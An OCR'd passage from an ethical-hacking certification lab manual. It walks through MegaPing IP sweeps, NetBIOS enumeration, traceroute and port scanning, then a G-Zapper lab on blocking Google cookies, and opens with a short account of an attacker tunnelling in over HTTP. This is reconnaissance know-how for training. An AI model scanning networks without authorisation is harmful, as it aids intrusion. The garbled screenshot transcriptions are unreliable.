a c c e s s t o t h e s y s te m . O n c e a c o n n e c t i o n h a s b e e n e s t a b l i s h e d , t h e a t t a c k e r
u p lo a d s a p r e c o m p i l e d v e r s io n o f t h e H T T P t u n n e l s e r v e r ( l i t s ) . W i t h t h e l i t s
s e r v e r s e t u p t h e a t t a c k e r t h e n s ta r t s a c l i e n t 0 11 h i s o r h e r s y s t e m a n d d i r e c t s i t s
t r a f f i c t o t h e S R C p o r t o f t h e s y s t e m r u n n i n g t h e l i t s s e r v e r . T h i s l i t s p r o c e s s
l i s t e n s 0 11 p o r t 8 0 o f t h e h o s t W W W a n d r e d i r e c t s t r a f f i c . T h e l i t s p r o c e s s
c a p t u r e s t h e t r a f f i c i n H T T P h e a d e r s a n d f o r w a r d s i t t o t h e W W W s e r v e r p o r t
8 0 , a f t e r w h i c h t h e a t t a c k e r t r ie s t o l o g i n t o t h e s y s t e m ; o n c e a c c e s s is g a in e d h e
o r s h e s e ts u p a d d i t i o n a l t o o l s t o f u r t h e r e x p l o i t t h e n e t w o r k .
M e g a P in g s e c u r i t y s c a n n e r c h e c k s y o u r n e t w o r k f o r p o t e n t i a l v u l n e r a b i l i t i e s t h a t
m i g h t b e u s e d t o a t t a c k y o u r n e t w o r k , a n d s a v e s i n f o r m a t i o n i n s e c u r i t y r e p o r t s .
111 t h i s l a b y o u w i l l l e a r n t o u s e M e g a P in g t o c h e c k f o r v u l n e r a b i l i t i e s a n d
t r o u b l e s h o o t is s u e s .
L a b O b j e c t i v e s
T h i s l a b g iv e s a n i n s i g h t i n t o p i n g i n g t o a d e s t i n a t i o n a d d r e s s l i s t . I t t e a c h e s
h o w t o :
■ P i n g a d e s t i n a t i o n a d d r e s s l i s t
■ T r a c e r o u t e
■ P e r f o r m N e t B I O S s c a n n in g
/ / V a lu a b le
in f o r m a t io n
s T e s t y o u r
k n o w le d g e
W e b e x e rc is e
m W o r k b o o k r e v ie w
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 235
M odule 03 - S can n in g N e tw o rk s
L a b E n v i r o n m e n t
T o c a n y o u t d i e l a b , y o u n e e d :
■ M e g a P in g is l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning N etw orks\S cann ing Tools\M egaPing
■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f M egaping f r o m t h e l i n k
h t t p : / / w w w . m a g n e t o s o f t . c o m /
■ I f y o u d e c id e t o d o w n l o a d t h e la te s t vers ion , t h e n s c r e e n s h o t s s h o w n
i n t h e l a b m i g h t d i f f e r
■ A d m i n i s t r a t i v e p r i v i l e g e s t o r u n t o o l s
■ TCP/IP s e t t in g s c o r r e c d y c o n f i g u r e d a n d a n a c c e s s ib le D N S s e r v e r
■ T h i s l a b w i l l w o r k i n t h e C E H la b e n v i r o n m e n t , o n W indow s Server 2012, W indow s 2008, a n d W indow s 7
L a b D u r a t i o n
T im e : 1 0 M in u t e s
C D Tools dem onstrated in th is lab are available in D:\CEH• Tools\CEHv8 Module 03 Scanning Networks
P IN G stands fo r P a c k e t In te rn e t G ro p e r.
O v e r v i e w o f P i n g
T h e p i n g c o m m a n d s e n d s In ternet Control Message Protocol (ICMP) e c h o r e q u e s t
p a c k e ts t o d ie ta r g e t h o s t a n d w a i t s f o r a n ICMP response. D u r i n g d i i s r e q u e s t -
r e s p o n s e p r o c e s s , p i n g m e a s u re s d ie t im e f r o m t r a n s m is s io n t o r e c e p t io n , k n o w n as
d ie round-trip tim e, a n d r e c o r d s a n y lo s s p a c k e ts .
L a b T a s k s
1 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r o n t h e l o w e r - l e f t
c o r n e r o f t h e d e s k t o p .
T A S K 1
IP Scanning
F IG U R E 13.1: W in d o w s Server 2012 - D esk to p v iew
2 . C l i c k d ie MegaPing a p p t o o p e n d ie MegaPing w in d o w .
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 236
M odule 03 - S can n in g N e tw o rk s
F IG U R E 15.2: W in d o w s Se rve r 2012 - A p p s
TQi^MegaPing ma!1^ n n d o w ^ ^ h o ^ M 1^ h ^ b l l o \ n n ^ gu־1 1^ ^ ^55 MegaPing (Unregistered) - □ ' x ד
3 .
File View Tools Hdp
*DNSLidrtosfe &י־ DNS Lookup Name Q Fngcr 1S Network Time gg Ping gg Traceroute
Who 11 ^ Network R#toufc#t <<•> Process Info
Systam Info £ IP Scanner $ NetBIOS Scanner •'4? Share Scanner ^ Security Scanner
-J? Port Scanner Jit Host Monitor
*S Lbt Ho>ts
F ig u re 15.3: M e g a P in g m a in w in d o w s
4 . S e le c t a n y o n e o f d i e op tions f r o m d i e l e f t p a n e o f d i e w i n d o w .
5 . S e le c t IP scanner, a n d t y p e i n t h e IP range i n d i e From a n d To f i e l d ; i n
t h i s la b t h e I P r a n g e is f r o m 1 0 .0 .0 .1 t o 10.0.0.254. C l i c k S ta rt
6 . Y o u c a n s e le c t t h e IP range d e p e n d in g o n y o u r n e t w o r k .
CQ A ll Scan n e rs can scan in d iv id u a l co m p u te rs, an y ran g e o f I P addresses, d o m a in s, an d se lected typ e o f co m p u te rs in s id e d o m ain s
S e cu rity scan n er p ro v id e s th e fo llo w in g in fo rm a tio n :N e tB IO S n am es, C o n fig u ra tio n in fo , o p en T C P and U D P p o rts , T ra n sp o rts , Sh ares, U se rs , G ro u p s , S e rv ice s , D r iv e rs , L o c a l D riv e s , Se ssio n s, R e m o te T im e o f D a te , P rin te rs
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 237
M odule 03 - S can n in g N e tw o rk s
־ ° rMegaPing (Unregistered)f s rFile V«׳*/ Took Help
^ ^ <׳3 v ^ eg< DNS List Hosts r ^ —_ r « a P -1 'S W W
IP Sconncr SKtngjt I3 Scanner
Selectiraccroutc
^ Whois I “ I | 10 0 0 1 10 0 0 254 | 1 S M 1
Network Resources ► Scam•׳׳
^ ״ ! ״ UX . I WU* t DNS Lookup Name
^ FingerNetwork Time
8a8 Ping
<§> Process Info ^ System Info■*iiaui.111■ £ NetBIOS Scanner Y* Share Scanner
j & Security Scanncr ^ Port Scanner ^ Host Monitor
F IG U R E 15.4: M e g a P in g I P S can n in g
I t w i l l l i s t d o w n a l l t h e IP addresses u n d e r d i a t r a n g e w i t h t h e i r TTL ( T im e t o L i v e ) , S ta tus ( d e a d o r a l i v e ) , a n d d i e s ta t is t ic s o f t h e d e a d
a n d a l i v e h o s t s .
MegaPing (Unregistered)
IP5i«nnw
$ IP Scanner SatngeX IP Scanner
Setect.
|R5rg־» 10 . 0 0 . 1 10 0 0 254 I StartF S ca re
□ o— l —Status: ZoTDCTCC 25^ accroco33 m 1 5 8CCS3
Show MAC Addresses
Hosts Stats To!d. 254 Active 4
Faicd: 250
Rcpon
A ttest Name Tme TTL Statj*.=1 10.0.0.1 0 54 Afivcg 1a0.04 1 128 Akvtg iao.o.6 0 128 Aive£ 1ao.o.7 0 128 Afcve
£ 1a0.0.10 D e l -j q 10.0.0.100 Dest..^ 1CL0.0.I0I D « t -
10.0.0.102 Dest —£ ic lo.o.io j De«t._j l 10.0.0.1m Dest —g 1a0.0.105 Dest._
Pie View Tools Help
1 1 g ft A <>i , DN: List Hosts,p, DNS Lookup Name Q Finger a Network Time
i t PingTraceroute HVhols
1“ 5 Network Resources % rocess Info ^ System Info
NetBIOS Scanner y* Share Scanner
$ Security Sconner l. Jj? Port Scanner
JSi Host Monitor
F IG U R E 15.5: M e g a P in g I P S can n in g R e p o rt
8 . S e le c t t h e NetBIOS S canner f r o m t h e l e f t p a n e a n d t y p e i n t h e I P r a n g e
i n t h e From a n d To f i e ld s . 111 t h i s la b , t h e IP range is f r o m 10.0.0.1 t o
10.0.0.254 C l i c k S ta rt
CD N e tw o rk u t ilit ie s :D N S lis t h o st, D N S lo o k u p n am e, N e tw o rk T im e S y n ch ro n i2 e r, P in g , T ra c e ro u te , W h o is , an d F in g e r.
S T A S K 2
NetBIOSScanning
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 238
M odule 03 - S can n in g N e tw o rk s
T IP If/egaPing (Unregistered)WFile View Tools Hdp
rP- A
N cGCS SsonrcrJ* | DNS List Hosts ,5, DNS Lookup Name g Finger 3 Network Time
tS P1n9 Traceroute
«£ WholsNetwork Resource
<$> Process Info System Info
^ IP Scanncr i! \
Share Scanner ^ Security Scanner ^ Port Scanner
Host Monitor
NetBIOS Scanner
F IG U R E 15.6: M e g a P in g N e tB IO S Scan n in g
9 . T h e NetBIOS s c a n w i l l l i s t a l l t h e h o s t s w i t h t h e i r NetBIOS names a n d
adap te r addresses
MegaPing (Unregistered)M e VtfA Tori? Help
JL JL 4S & *“8 88 &K«BIT$ Scarrer&
Men BIOS Scarrra^ Net 90$ Scanrer
Stop10 0 . 0 .254
Expard י1NamesExpandSummary
] | 10 . 0 . 0 . 1 ||Rerg5
NstEtOS ScanneraJatLS־ Zoroeec Quemg Net BOS Names on
Sots
Told. 131Actvc 3=a!od 123
Report
Name STctus100.0.4 WIN-ULY833KHQ.. A l*«
» 2 ) NetBIOS Names 3W g f Adopter Address 00 15-5D 00-07 . . Microsoft ״A □cmam WORKGROUPiac.0.6 ADMIN• PC Alivefr] NetBIOS Nome: 6
W B Adapter Addre« ״ M<T0?cfr ..־00-15-50-00-074^ Domain WORKGROUP100.0.7 WIN-D39MRSHL.. A lv#
» j | ] NetBIOS Names 3X f Adapter Address D4-BE-D9-C3-CE..
JJ, DNS List Hosts j!L DNS Lookup Nam• Q Finger !31 Network Time t i p,n9g*3 Traceroute ^ Whole
- O Network Resources % Process Info
J״״ ^ System Info ^ IP Scanner$ m g g n n 14jp Share Scanner
Security Scanner y״/ Port Scanner 2 ( Host Munitur
NetBIOS Scanner
F IG U R E 15.7: M e g a P in g N e tB IO S S can n in g R e p o rt
1 0 . R i g h t - c l i c k t h e I P a d d r e s s . 111 t h i s l a b , t h e s e le c t e d I P is 1 0 .0 .0 . 4 ; i t w i l l
b e d i f f e r e n t i n y o u r n e t w o r k .
1 1 . T h e n , r i g h t - c l i c k a n d s e le c t t h e Trace rou te o p t i o n .
ס MegaPing can scan your entire ne tw ork and provideinform ation such as open shared resources, open ports,services/drivers ac tive on the com puter, key reg istry entries, users and groups, trusted domains, printers, and more.
& Scan results ־can be saved in HTML or TXT reports, w hich can be used to secure your ne tw ork ■־ fo r example, by shutting down unnecessary ports, closing shares, etc.
5 T A s K 3
Traceroute
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 239
M odule 03 - S can n in g N e tw o rk s
I I MMegaPing (Unregistered)vFile View Tools Hdp
NetBICS Scarre־
NetBIOS Scanner S9<tngs
Start0 254
NamesDcpandSummary
$ M *30S Scarner
Soeci: Rom:
Range v | 10 0 0
NetElOS SeinerSatus Carotored ?M addresses m M secs
* b3?׳ 0 ( jjNome
Hoete Slate Total: 254 Active 3 Failed251 ־
Export To File
Merge Hosts
Open Share View Hotfix Detab
Apply Hot Fixes
Copy selected item Copy selected row Copy all result; Save As
_______B 0 B ■
* D NetBIOS f■ AdapeerA
A Comain - j j 10.0.0.5
i - J | NetBIOSS ? Adopter A ^ Com a in
B A 10.0.0.7£ NetBIGS ף
■3 Adopter A
Traceroute
^ DNS List Hosts ; j , DNS Lookup Name g Finger 3 Network Time
t®* Pin9 A Traceroute 4 $ Whois
Network Resources Process Info
^ System Info ־• IP Scanner J׳ ^ NetBIOS Scanner
Share Scanner Security Scanner
^ Port Scanner g l Host Monitor
Tnccroutcs the selection
F IG U R E 15.8: M e g a P in g T ra ce ro u te
1 2 . I t w i l l o p e n t h e Trace rou te w i n d o w , a n d w i l l t r a c e d i e I P a d d r e s s
s e le c te d .
MegaPing (Unregistered)Fie Vie■ a Tools Help
S. JL 4$ 151 *« 88Tracer out*
aa Traceroute Setthot**
□ Select Al
□ Resolve I4an־sDestrebon:1050.4Ztestrawn \Jdrcs5 Jst
Add
Ddctc
Repoit |
hoo Time Name Dstafc
9 <91 י WIN-ULY8S8KHUIP [1_ Complete.
1 m £ 1 0 10.0.0.4 <»73/1210t44tf
A ־ ' ADMIN PC [10.0.0.6] Complete.
* 4 1 ו 10.0.0.6 08/23/12 IQ4SJ1
Jj, DNS List Ho>b J!L DNS Lookup Nam• | J Finger i l l Network Time
^ Whois- O Network Resources
Process Info System Info
■ ^ IP ScannerNetBIOS Scanner
*jp Share Scannei Security Scanner
y<׳ Port Scanner jtA Ho»t Monitor
F IG U R E 15.9: M e g a P in g T ra c e ro u te R e p o rt
1 3 . S e le c t P o r t S c a n n e r f r o m d i e l e f t p a n e a n d a d d
w w w .ce rtif ie d h a cke r.co m 111 t h e D estina tion Address L is t a n d t h e n
c l i c k t h e S ta rt b u t t o n .
1 4 . A f t e r c l i c k i n g t h e S ta rt b u t t o n i t t o g g le s t o Stop
1 5 . I t w i l l l i s t s t h e p o r t s a s s o c ia t e d w i t h w w w . c e r t i f i e d l 1 a c k e r . c o m w i t h d i e
k e y w o r d , r i s k , a n d p o r t n u m b e r .
ם O th e r fea tu res in c lu d e m u ltith re ad e d d esig n th a t a llo w s to p ro cess an y n u m b er o f req u ests in an y to o l a t th e sam e tim e , real- tim e n e tw o rk co n n ec tio n s sta tu s and p ro to co ls s ta tis tics , real- tim e p ro cess in fo rm a tio n and usage, rea l- tim e n e tw o rk in fo rm a tio n , in c lu d in g n e tw o rk co n n ec tio n s , and o p e n n e tw o rk file s , system tra y su p p o rt, an d m o re
& Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
S T A s K 4
Port Scanning
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 240
M odule 03 - S can n in g N e tw o rk s
ך v ן - י ״ MegaPing (Unregistered)זFile View Tools Help
A A £ G J 8s 8s <5 J ' b & r H I J & GO
J׳!jftjf F01 Sc*1r*׳^ AotScamcr
PrttowlB TCP an: UCPm m n׳>«־׳fl׳V**tv30«־> Scan Type A/!h»1»S Pab -11 S100Desindo Ai^nt Ua>
□ S*t*d Al
w»!* |
2 o r * T>oe Keyword De8a1ctor R *= S Scanning— (51 %)
3 Ce2 fc 99 Sccon ds Remain ח gTCP ftp File T ransfer [Control] EksatcdTCP www-http World V.'1de Web HTTP Elevated
,y 1 UDP tcpmux TCP Port Servkc MultL. Ele.xed.* 2 JOP compress.. Management Utility L<*m. y ! UDP comp ten . CompreiMoo Proem Law.*5 JOP rje Remote Job Entr>׳ Low
JOP echo Echo Lowj * UOP ditcntd Discard Law
' ■
- jj, DNS List Hosts,5, DNS Lookup Name ^ Finger54 Network Time f t Ping gg Traceroute ^ Whois
Network Resources- P ick m Info
System Into U IP Sc«nn«<
' f f NetBIOS Sc *nnei Share Seanner
4P S«cjntyScanner JjfJ f ) , H 05ז Monitor
F IG U R E 15.10: M e g a P iiig P o r t S ca n n in g R e p o rt
L a b A n a l y s i s
D o c u m e n t a l l d i e I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p l ic a t io n s , a n d p r o t o c o ls
y o u d is c o v e r e d d u r i n g d ie la b .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
M e g a P i n g
I P S c a n R a n g e : 1 0 .0 .0 .1 — 1 0 .0 .0 . 2 5 4
P e r f o r m e d A c t i o n s :
■ I P S c a n n in g
■ N e t B I O S S c a n n in g
■ T r a c e r o u t e
■ P o r t S c a n n in g
R e s u l t :
■ L i s t o f A c t i v e H o s t
■ N e t B i o s N a m e
■ A d a p t e r N a m e
M e g a P in g se cu rity scan n er ch eck s yo u r n e tw o rk fo r p o te n tia l vu ln e ra b ilitie s th a t m ig h t use to a ttack y o u r n e tw o rk , an d saves in fo rm a tio n in se cu rity re p o rts
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 241
M odule 03 - S can n in g N e tw o rk s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. H o w d o e s M e g a P in g d e te c t s e c u r i t y v u ln e r a b i l i t i e s o n d ie n e t w o r k ?
2 . E x a m in e t h e r e p o r t g e n e r a t io n o f M e g a P in g .
I n t e r n e t C o n n e c t i o n R e q u i r e d
0 N oe s□ Y
P l a t f o r m S u p p o r t e d
0 i L a b s0 C l a s s r o o m
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 242
M odule 03 - S can n in g N e tw o rk s
Lab
D etect, D elete an d B lock G oogle C ookies U sing G -ZapperG-Zapper is a utility to block Goog/e cookies, dean Google cookies, and help yon stay anonymous while searching online.
L a b S c e n a r i o
Y o u h a v e l e a r n e d i n d i e p r e v i o u s la b d i a t M e g a P in g s e c u r i t y s c a n n e r c h e c k s
y o u r n e t w o r k f o r p o t e n t i a l v u l n e r a b i l i t i e s t h a t m i g h t b e u s e d t o a t t a c k y o u r
n e t w o r k , a n d s a v e s i n f o r m a t i o n i n s e c u r i t y r e p o r t s . I t p r o v i d e s d e t a i le d
i n f o r m a t i o n a b o u t a l l c o m p u t e r s a n d n e t w o r k a p p l ia n c e s . I t s c a n s y o u r e n t i r e
n e t w o r k a n d p r o v i d e s i n f o r m a t i o n s u c h a s o p e n s h a r e d r e s o u r c e s , o p e n p o r t s ,
s e r v ic e s / d r i v e r s a c t i v e 0 11 t h e c o m p u t e r , k e y r e g i s t r y e n t r ie s , u s e r s a n d g r o u p s ,
t r u s t e d d o m a in s , p r i n t e r s , e t c . S c a n r e s u l t s c a n b e s a v e d i n H T M L o r T X T
r e p o r t s , w h i c h c a n b e u s e d t o s e c u r e y o u r n e t w o r k .
A s a n a d m i n i s t r a t o r , y o u c a n o r g a n iz e s a f e t y m e a s u r e s b y s h u t t i n g d o w n
u n n e c e s s a r y p o r t s , c l o s i n g s h a r e s , e t c . t o b l o c k a t t a c k e r s f r o m i n t r u d i n g t h e
n e t w o r k . A s a n o t h e r a s p e c t o f p r e v e n t i o n y o u c a n u s e G - Z a p p e r , w h i c h b lo c k s
G o o g le c o o k ie s , c le a n s G o o g l e c o o k ie s , a n d h e lp s y o u s ta y a n o n y m o u s w h i l e
s e a r c h in g o n l i n e . T h i s w a y y o u c a n p r o t e c t y o u r i d e n t i t y a n d s e a r c h h i s t o r y .
L a b O b j e c t i v e s
T h i s l a b e x p la i n h o w G - Z a p p e r a u t o m a t i c a l l y d e te c ts a n d c leans t h e G o o g le
c o o k ie e a c h t i m e y o u u s e y o u r w e b b r o w s e r .
L a b E n v i r o n m e n t
T o c a r r y o u t t h e la b , y o u n e e d :
I C O N K E Y
V a lu a b le
in f o r m a t io n
T e s t y o u r
k n o w le d g e
m . W e b e x e rc is e
o W o r k b o o k r e v ie w
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 243
M odule 03 - S can n in g N e tw o rk s
G - Z a p p e r is l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning N etw orks\Anonym izers\G -Zapper
Y o u c a n a ls o d o w n l o a d d i e la t e s t v e r s io n o f G־Zapper f r o m t h e l i n k
l i t t p : / / w w w . d u m m y s o f t w a r e . c o m /
I f y o u d e c id e t o d o w n l o a d t h e la te s t vers ion , t h e n s c r e e n s h o t s s h o w n
i n t h e la b m i g h t d i f f e r
I n s t a l l G-Zapper i n W i n d o w s S e r v e r 2 0 1 2 b y f o l l o w i n g w i z a r d d r i v e n
i n s t a l l a t i o n s te p s
A d m i n i s t r a t i v e p r i v i l e g e s t o r u n t o o l s
A c o m p u t e r r u n n i n g W indow s Server 2012
L a b D u r a t i o n
T im e : 1 0 M in u t e s
O v e r v i e w o f G - Z a p p e r
G - Z a p p e r h e lp s p r o t e c t y o u r i d e n t i t y a n d s e a r c h h is t o r y . G - Z a p p e r w i l l r e a d d ie
Google cookie in s t a l le d o n y o u r P C , d is p la y d ie d a te i t w a s in s ta l le d , d e t e r m in e h o w
lo n g y o u r searches h a v e b e e n tracked, a n d disp lay y o u r G o o g le s e a rc h e s . G -
Z a p p e r a l lo w s y o u t o a u t o m a t ic a l l y delete o r e n t i r e l y block d ie G o o g le s e a rc h
c o o k ie f r o m f u t u r e in s ta l la t io n .
L a b T a s k s
S t a s k 1 1 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r o n t h e l o w e r - l e f t
D etect & Delete c o m e r o f t h e d e s k t o p . _____________________________________________________
Google Cookies
F IG U R E 16.1: W in d o w s Server 2012 - D eskto p v iew
2 . C l i c k d ie G-Zapper a p p t o o p e n d ie G־Zapper w in d o w .
!3 Windows Serve! 2012
* ttcua Stfwr JOtJ Release Cmadtte Oatacert* ftabslanuwy. 1uMM>:
S ’ Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 244
M odule 03 - S can n in g N e tw o rk s
Administrator £
G-Zapper
S t a r t
ServerManager
WruiowsPowerShel
6009*Chrome
Wjpw-Vt/dru^e-
Ancrym..SurfogTutonal
fLm V # 11 □Computer Control
P w lHyperVVirtualM«tww
SOL Sena
* J w QCommandPrompt
M v i il.retox
'-x-olglan n $ 51NetSca'iT... Pro Demo Standard
Maw r* 11
F IG U R E 162: W in d o w s Se rve r 2012 - A p p s
3 . T h e G-Zapper m a in w i n d o w w i l l a p p e a r a s s h o w n i n t h e f o l l o w i n g
s c r e e n s h o t .
G-Zapper ־ TRIAL VERSION
W hat is G -Zapper
G-Zapper - Protecting yo u Search Privacy
Did you know • Google stores a unique identifier in a cookie on your PC , vrfich alow s them to track the keywords you search for G-Zapper w i automatically detect and clean this cookie in your web browser. Ju st run G-Zapper, mrwnee the wndow , and en!oy your enhanced search privacy
2 ' I A Google Tracking ID oasts on your PC.Your Google ID (Chrome) 6b4b4d9fe5c60cc1Google nsta led the cookie on W ednesday. September 05.2012 01 54 46 AM
Your searches have been tracked for 13 hours
«>| No Google searches found n Internet Explorer or Frefox
How to Use It
« To delete the Google cookie, d c k the Delete Cookie buttonYour identity w i be obscured from previous searches and G-Zapper w i reg Jarly dean future cookies.
T0 restore the Google search cookie d ick the Restore Cookie button
htto //www dummvsof twar e. com
RegisterSettingsTest GoogleRestore CookieDelete Cookie
F IG U R E 16.3: G - Z a p p e r m a in w in d o w s
4 . T o d e le t e t h e G o o g le s e a r c h c o o k ie s , c l i c k t h e Delete Cookie b u t t o n ; a
w i n d o w w i l l a p p e a r t h a t g iv e s i n f o r m a t i o n a b o u t t h e d e le t e d c o o k ie
l o c a t io n . C l i c k OK
m G - Z a p p e r xs co m p a tib le w ith W in d o w s 9 5 ,9 8 , M E , N T , 2000, X P , V is ta , W in d o w s 7.
L J G - Z a p p e r h e lp s p ro te c t y o u r id e n tity an d search h is to ry . G - Z a p p e r w ill read th e G o o g le co o k ie in s ta lle d o n yo u r P C , d isp la y th e d a te it w as in s ta lle d , d e te rm in e h o w lo n g yo u r search es h ave b een tra cked , an d d isp la y yo u r G o o g le searches
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 245
■ ]j l F x יי G-Zapper - TRIAL VERSION
M odule 03 - S can n in g N e tw o rk s
W hat is G-Zapper
G-Zapper ־ Protectng your Search Privacy
Did you know ■ Google stores a unique identifier n a cookie on yo u PC , v*»ch alow s them 10 track the keywords you search for G-Zapper w i automatically defect and dean this cookie in your web browser.
_.lm tJun_G 7annftj the, wndnw * in i ftninu.unui nhaocad joauacu_______ _______
G־Zapper
The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com
The cookie was located a t(Firefox) C:\Users\Administrator\ApplicationData\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite
©
OK
T0 block and delete the Google search cookie, click the Block Cookie button (Gmail and Adsense w i be unavaJable with the cookie blocked)
http //www. dummvsoftware com
■#
Howt
RegisterSettingsTest GoogleBlock CookieDelete Cookie
C ] A n e w co o k ie w ill be gen erated u p o n yo u r nex t v is it to G o o g le , b reak in g th e ch a in th a t re la te s yo u r searches.
F IG U R E 16.4: D e le tin g search co o k ies
5 . T o b l o c k t h e G o o g l e s e a r c h c o o k ie , c l i c k d i e B lock cook ie b u t t o n . A
w i n d o w w i l l a p p e a r a s k in g i f y o u w a n t t o m a n u a l l y b l o c k t h e G o o g le
c o o k ie . C l i c k Yes
'- mG־Zapper ■ TRIAL VERSION
W hat is G -Zapper
G-Zapper - Protectng yo u Search Privacy
Did you know - Google stores a unique identifier in a cookie on your PC . which alow s them to track the keywords you search for. G-Zapper will automatically detect and dean this cookie in yo u web browser.
p____.LM iijn fi-Zan rre t mrnnnre the, wnrinw and pjiinu .unu..ftnhanrari sftatnh nrtvara________________
Manually Blocking the Google Cookie
Gmail and other Google services will be unavailable while the cookie is manually blocked.If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically.
Are you sure you wish to manually block the Google cookie?
N oYes
How
T0 block and delete the Google search cookie, click the Block Cookie bUton (Gmail and Adsense w l be unavaiaW e with the cookie blocked)
http //www dummvsoftware, com
RegisterSettingsTest GoogleBlock CookieDelete Cookie
F IG U R E 16.5: B lo c k G o o g le co o k ie
6. I t w i l l s h o w a m e s s a g e d i a t t h e G o o g le c o o k ie h a s b e e n b lo c k e d . T o
v e r i f y , c l i c k OK
The tin ס y tray icon runs in the background, takes up very lit t le space and can no tify you by sound & anim ate when the Google cookie is blocked.
Eth ica l Hacking and Countermeasures Copyright O by EC-CoundlA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 246
M odule 03 - S can n in g N e tw o rk s
G־Zapper - TRIAL VERSION
W hat is G-Zapper
G-Zappef - Protechng your Search Privacy
Did you know ■ Google stores a unique kfentifiet in a cookie on your PC . which alow s them to track the 1 ^ 0 keywords you search for G-Zapper will automatically detect and dean this cookie n yo u web browser.
Ju st run G-Zapper, mmmize the w rxlow , and enjoy your enhanced search privacy
G־Zapper
The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify.
OK
Your identity will be obscured from previous searches and G-Zapper w i regularly clean M ure cookies
T 0 restore the Google search cookie c lck the Restore Cookie button
http //www dummvsoltware com
How t
RegisterSettingsTest GoogleRestore CookieDelete Cookie
F IG U R E 16.6: B lo c k G o o g le co o k ie (2 )
7 . T o t e s t t h e G o o g l e c o o k ie t h a t h a s b e e n b l o c k e d , c l i c k t h e T est Google b u t t o n .
8. Y o i u d e f a u l t w e b b r o w s e r w i l l n o w o p e n t o G o o g l e ’ s P r e f e r e n c e s p a g e .
C l i c k OK.
A A goog... P - 2 (5 [ 0 ?references ו י-
♦You Search Images Maps Play YouTube News Gmal More ־ Sign in 1
Goflflls Account 5£tt303 Piefeiences Help I About Google
Save Preferences
PreferencesGoogleSave your preference* when finished and !*turn to iw rch
Global Preferences (changoc apply to al Googio sorvtcos)
Your cookies seem fo be disabled.Setting preferences will not work until you enable cookies in your
browser.BaHiflafcfllttg
Interface Language Display Googio Tips and messages in: EngiisnIf you do not find your native language in the pulldown above you can help Google create it through our Google in Your I anfliiage program
Piefei pages mitten in the*e language(*)□ Afrikaans b£ English U Indonesian L I Setblan□ Arabic L. Esperanto U Italian □ SlovakD Armenian I~ Estonian F I Japanese 0 Slovenian□ Belarusian C Ftipino □ Koiean G SpanishU Bulgarian L Finnish U Latvian L I Swahi
Search I anguag*
F IG U R E 16.7: C o o k ie s d isab led m assage
9 . T o v i e w t h e d e le t e d c o o k ie i n f o r m a t i o n , c l i c k d i e S etting b u t t o n , a n d
c l i c k V ie w Log i n t h e c le a n e d c o o k ie s l o g .
& G-Zapper can ־also clean your Google search h isto ry in Internet Explorer and Mozilla Firefox.It's fa r too easy fo r someone using your PC to get a glim pse o f w hat you've been searching for.
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 247
M odule 03 - S can n in g N e tw o rk s
׳ - mG-Zapper - TRIAL VERSION
W hat is G -Zapper
G-Zapper Settings
Sounds
Preview Browsef* R ay sound effect when a cookie is deleted default w av
Google Analytics T iackrtg
W Block Google Analytics fiom tiackng web sites that I visit.
V iew Log
D eaned Cookies Log
Clear LogW Enable logging of cookies that have recently been cleaned.
I ” Save my Google ID in the deaned cookies log.
OK
RegisterSettingsRestore Cookie Test GoogleDelete Cookie
Q Y o u can s im p ly ru n G - Z a p p e r, m in im iz e th e
w in d o w , an d e n jo y yo u r e n h an ced search p riv a c y
F IG U R E 16.8: V ie w in g th e d e le ted log s
1 0 . T h e d e le t e d c o o k ie s i n f o r m a t i o n o p e n s i n N o t e p a d .
cookiescleaned - Notepad t ־־ ] ם xFile Edit Format View Help
